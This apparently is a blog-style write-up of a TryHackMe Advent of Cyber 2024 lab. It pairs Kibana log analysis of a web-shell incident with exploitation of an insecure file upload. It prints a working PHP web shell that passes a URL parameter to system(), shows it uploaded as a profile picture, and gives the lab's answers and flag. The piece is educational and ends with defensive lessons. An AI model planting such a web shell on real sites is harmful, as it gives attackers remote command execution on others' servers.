Advent of Cyber 2024 — Day 3: Log Analysis and RCE Vulnerability

Today’s Advent of Cyber challenge focused on log analysis using ELK for blue-teaming and exploiting a file upload vulnerability for red-teaming. Below is a breakdown of the tasks, tools, and lessons learned.

Operation Blue: Investigating with ELK

Tools Used:

• Kibana from the ELK stack for log analysis.
• KQL (Kibana Query Language) for filtering and querying logs.

Steps:

1. Access ELK:

• Opened http://MACHINE_IP:5601 in the AttackBox browser.
• Selected the frostypines-resorts collection in the Discover tab of Kibana.

2. Set Time Range:

• Defined the range from October 3, 2024, 11:30 to 12:00 to view the relevant logs.

3. Filtered Logs:

• Narrowed down logs based on suspicious activity by IP address and file names.
• Identified access to shell.php within /media/images/rooms/.

4. Insights:

• Web Shell Location: /media/images/rooms/shell.php
• Attacker IP Address: 10.11.83.34

Operation Red: Exploiting the Vulnerability

Objective: Exploit an insecure file upload vulnerability on the Frosty Pines Resort website to retrieve the flag.txt.

Steps:

1. Set Up:

• Edited the /etc/hosts file on the AttackBox to reference frostypines.thm.

echo "MACHINE_IP frostypines.thm" >> /etc/hosts

• Accessed the vulnerable web application via http://frostypines.thm.

2. Crafted Malicious PHP File:

• Created a file named shell.php with the following code using my sublime text editor on the Attackbox:

<html>
<body>
<form method="GET">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
     if(isset($_GET['command'])) {
         system($_GET['command'] . ' 2>&1');
     }
 ?>
 </pre>
 </body>
 </html>

3. Exploited File Upload:

• Uploaded shell.php as a "profile picture."
• Accessed the script via the URL /media/images/rooms/shell.php.

1. Executed Commands via Web Shell:

• Navigated to the directory containing flag.txt using commands like:

pwd
ls
cat flag.txt

• Retrieved the contents of flag.txt:

THM{Gl1tch_Was_H3r3}

TASKS

1. Where was the web shell uploaded to? /media/images/rooms/shell.php
2. What IP address accessed the web shell? 10.11.83.34
3. What is the content of flag.txt? THM{Gl1tch_Was_H3r3}

Lessons Learned

1. Log Analysis Best Practices:

• ELK is a powerful tool for centralizing and analyzing logs.
• KQL simplifies narrowing down search criteria in extensive datasets.

2. Vulnerabilities in File Uploads:

• Web applications must validate file types, size, and contents to prevent malicious uploads.
• Disallow execution of uploaded files by properly configuring web server permissions.

3. Exploitation Awareness:

• Understanding RCE helps defenders anticipate attack vectors.
• Regular audits and penetration tests can help identify these flaws before attackers do.

This task provided a valuable hands-on experience in blue and red teaming. And insights into the ELK